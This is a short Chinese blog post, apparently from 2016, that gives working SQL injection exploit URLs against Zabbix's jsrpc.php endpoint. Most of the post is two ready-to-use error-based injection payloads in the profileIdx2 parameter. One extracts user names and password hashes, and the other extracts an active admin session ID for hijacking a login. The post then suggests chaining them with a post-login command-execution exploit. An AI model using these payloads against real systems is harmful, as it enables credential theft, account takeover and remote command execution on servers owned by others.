Zabbix最新SQL注射漏洞利用

freebuf刚爆Zabbix的sql注入:http://www.freebuf.com/vuls/112197.html

漏洞测试:
爆用户名和密码:

[sourcecode language=”plain”]
http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(alias,0x7e,passwd,0x7e) from users limit 1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
<img src="https://phpinfo.me/wp-content/uploads/2016/08/1.png" width="1337" height="500" alt="" class="alignnone size-medium" />[/sourcecode]

爆sessionid(可替换刷新登陆)

[php]
http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(sessionid,0x7e,userid,0x7e,status) from sessions where status=0 and userid=1 LIMIT 0,1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
<img src="https://phpinfo.me/wp-content/uploads/2016/08/2.png" width="1361" height="469" alt="" class="alignnone size-medium" />[/php]

配合这个登录后的命令执行使用https://www.exploit-db.com/exploits/39937/

文 / Aex
loading